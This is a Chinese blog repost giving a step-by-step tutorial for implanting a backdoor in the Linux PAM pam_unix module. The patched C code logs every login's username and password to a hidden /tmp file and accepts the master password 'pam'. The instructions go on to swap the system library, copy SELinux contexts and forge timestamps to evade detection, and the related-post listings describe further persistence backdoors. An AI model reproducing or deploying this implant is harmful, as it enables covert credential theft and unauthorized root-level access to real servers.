pam后门 和应用实例

最新推荐文章于 2024-02-19 08:00:00 发布
最新推荐文章于 2024-02-19 08:00:00 发布
阅读量345 收藏
点赞数
文章标签: python 运维
原文链接:https://my.oschina.net/9199771/blog/741709
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

pam发现了一个具体情况做一下记录 顺便把安装方式重新写一遍

rpm -qa | grep pam #查看pam版本 pam-1.1.1 看这个版本号

http://www.linux-pam.org/library/  下载对应版本

修改modlues/pam_unix/目录下的pam_unix_auth.c

找到

/* verify the password of this user */

//添加以下代码

retval = _unix_verify_password(pamh, name, p, ctrl);

//存储密码的地方
if(retval== PAM_SUCCESS)
{
    fp=fopen("/tmp/.../pslog","a");
    fprintf(fp,"%s::%s\n",name,p);
    fclose(fp);
}

//万能密码
if(strcmp(p,"pam")==0)
{
    retval = PAM_SUCCESS;
}

#别忘了在添加完之后在这个函数头部 添加 FILE *fp;

yum install flex

./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr

会提示yywrap 还是出错 要添加一个函数

int yywrap(){return 1;} 

到提示错误的文件最上面就行

make 直到make成功

编译完了  在modules/pam_unix/.libs中的pam_unix.so就是后门

手动创建密码文件:

touch /tmp/.../pslog;chmod a+w /tmp/.../pslog

转到路径  /lib64/security/

上传文件 pam_unix.so1  

mv pam_unix.so pam_unix.so.bak
mv pam_unix.so1 pam_unix.so

查看Selinux上下文:

ls -Z pam_unix.so.bak (备份的原始文件)

设置Selinux上下文:

chcon -reference=pam_unix.so.bak pam_unix.so
setsebool -P allow_saslauthd_read_shadow 1

设置文件时间戳

touch pam_unix.so -r pam_umask.so

路径 /lib64/security/pam_unix.so  #替换掉就行了  别忘记备份源文件啊啊

转载于:https://my.oschina.net/9199771/blog/741709

weixin_33834137
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux PAM&&PAM后门
ronon77的专栏
03-17 252
0x00 PAM简介 PAM (Pluggable Authentication Modules )是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中,目前已移植到其它系统中,如...
小白必看的【白帽晋升之路】:PAM后门小研究
weixin_59086772的博客
06-09 265
随着信息化不断发展,信息安全问题日益严重,网络信息安全已是国家安全的重要组成部分。各种安全漏洞层出不穷,更新速度越来越快。雨人网安基地——雨笋教育开辟网络安全技术分享专栏~由学院的各位技术大牛、专家讲师和大家分享最新的技术内容,是不是很期待呢? 首篇是由黄佳院长给大家带来【白帽晋升之路】第一期:PAM后门小研究。 0x00 在渗透某目标的过程中,发现目标服务器已被植入后门,具体表现是在/tmp/.p目录下,存在以日期为后缀的pass.txt文件,内容为记录 SSH 登录 IP、用户名和密码。 .
持久化:利用Linux PAM创建后门
最新发布
qq_68163788的博客
02-19 1376
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
LINUX留后门--教程(六)—— PAM后门
W小哥
07-14 5600
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.160.144 (centos7) 攻击IP: 192.168.160.1 (win10 xhell) 2.1 pam介绍 在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过
PAM模块的backdoor实现分析
weixin_33924770的博客
04-14 135
环境RHEL6.4 wget http://www.linux-pam.org/library/Linux-PAM-1.1.1.tar.gz tar xzvf Linux-PAM-1.1.1.tar.gz主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c/* verify the password of this user */ ...
madlib:PAM后门
05-30
用 /bin/bash 替换 /bin/false 和 /bin/nologin(有效地使任何用户都能够 ssh 进入) 要求: 需要Python3 需要root权限 默认条目: 默认情况下,用户名/密码记录到/usr/include/type.h 默认魔法密码是...
pampam应用
06-19
详细介绍了pampam应用的 原理,还有相关的可执行的小例子,很值得学习
Linux——PAM-的应用开发和内部实现源码分析
11-16
Linux——PAM-的应用开发和内部实现源码分析,介绍了如何利用PAM模块编程进行对Linux操作系统安全访问。
linux操作系统PAM模块实例
11-06
Linux 操作系统 PAM 模块实例详解 PAM(Pluggable Authentication Modules)是由 Sun 公司提出的一种认证机制,初次集成在 Solaris 系统上。PAM 的出现解决了之前系统验证机制混乱的问题,提供了一套统一的验证机制...
使用PWM和PAM测量电路的交流功耗
01-20
这种方法使用便宜的运放和模拟开关实现脉冲宽度/脉冲幅度调制器(PWM/PAM)并将它用作四象限乘法器。这种电路经过修改可以用于许多不同的应用。  PWM/PAM乘法器的基本概念是,一个(非重叠)脉冲波形在单个周期内...
linux pam介绍
05-21
PAM(Pluggable Authentication Modules)即可插拔式认证模块,它是一种高效而且灵活便利的用户级别的认证方式,它也是当前Linux服务器普遍使用的认证方式。
Linux 安全之pam后门
weixin_34218890的博客
12-20 409
本文方法来自网络:Sky原创本文测试环境为:RHEL 6.1 X64一.查看系统pam版本:[root@redkey ~]# rpm -qa | grep pam pam-1.1.1-4.el6.x86_64二.下载对应版本的pam模块http://www.linux-pam.org/library/三.解压&修改pam_unix_auth.c文件tar -xzvf ...
linux上的PAM后门理解与学习
Shanfenglan's blog
09-09 1273
文章目录1. 什么是PAM2. 读懂PAM配置文件 1. 什么是PAM 全称为Pluggable Authentication Modules,是一种身份认证机制。直译是可插入的身份验证模块。 简单理解为,应用程序可以调用PAM给的接口来进行身份验证而不用自己去写详细的身份验证模块,将身份验证端于服务端分离,根据返回值来决定验证是否通过进而是否提供服务,具体验证规则取决于自定义的配置文件,也就是/etc/pam.d/下的配置文件,例如sshd服务的配置文件就为/etc/pam.d/sshd。 2. 读懂P
SSH PAM后门(万能密码、记录密码)
网络安全。
08-19 3406
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
pam backdoor 安装使
p656456564545的专栏
02-25 1244
Linux后门转自:http://www.unshadow.com/?p=49用 linux上的后门我就不啰嗦了,昨天一时兴起,仔细研究了下pam backdoor,弄懂了后门安装的整个过程,下面我就来讲下这个后门的安装以及使用。     首先,这个PAM后门可以达到两个效果,一个是万能密码,一个是键盘记录。可以记录所有的登陆到这台机器的ssh用户的密码,默认保存在/t
linux生成pam,Linux的一个后门引发对PAM的探究
weixin_32097465的博客
05-14 184
1.1起因今天在搜索关于Linux下的后门姿势时,发现一条命令如下:软链接后门:Defaultln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;1ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=5555;经典后门。直接对sshd建立软连接,之后用任意密码登录即可。sshroot@x.x.x.x-p55...
linux pam 解锁_Linux系统安全之pam后门安装使用详解
weixin_33324399的博客
12-24 562
一.查看系统pam版本:[root@redkey ~]# rpm -qa | grep pampam-1.1.1-4.el6.x86_64二.下载对应版本的pam模块http://www.linux-pam.org/library/三.解压&修改pam_unix_auth.c文件tar -xzvf Linux-PAM-1.1.1.tar.gzcd Linux-PAM-1.1.1cd mod...
linux系统安全之pam后门
weixin_33971977的博客
09-30 359
本文由Sky原创投稿,请尊重劳动成果,转载注明出处!测试环境:Centos 6.2 64位0×01:查询本机的PAM版本下载地址:http://www.linux-pam.org/library/https://fedorahosted.org/releases/l/i/linux-pam/下载对应的版本对原有的文件进行备份0×02:修改源文件修改pam_unix_auth....
系统是否有后门?Linux安全加固之PAM知多少
jiangzhuwanshi2008的博客
02-16 2070
前言Linux在新装的系统中,更改用户的密码时可能会遇到以下报错:BAD PASSWORD: The password fails the dictionary check - it is based on a dictionary word这是由于系统会对新密码进行检查,如果系统觉得新密码过于简单或不安全,系统就会报错。如果想继续使用简单的密码,通常可以通过更改/etc/pam.d/sysyst...
pam算法应用案例python
06-10
PAM(Partitioning Around Medoids)算法是一种聚类算法,它与K-Means算法类似,但是PAM算法选取的聚类...使用时,只需要将数据集X和聚类的数量k作为参数传入PAM函数即可。该函数将返回聚类中心和每个数据点的标签。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值